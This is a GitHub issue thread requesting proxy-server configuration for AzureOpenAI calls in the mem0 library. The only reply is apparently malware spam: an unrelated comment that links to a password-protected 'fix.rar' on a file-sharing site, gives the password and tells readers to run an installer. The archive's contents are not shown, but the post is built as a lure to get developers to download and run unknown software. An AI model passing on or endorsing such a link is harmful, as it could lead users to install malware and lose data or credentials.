### ISSUE TITLE
Adding proxy settings to azure openai

### ISSUE THREAD

**Issue by PranavPuranik** [mem0ai/mem0#1754]
### 🚀 The feature

Allows you to pass http proxy server links in config, so `AzureOpenAI` requests can be routed via the server.

### Motivation, pitch

Can be used behind company firewall, allows mem0 to be used by different companies that restrict OpenAI

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
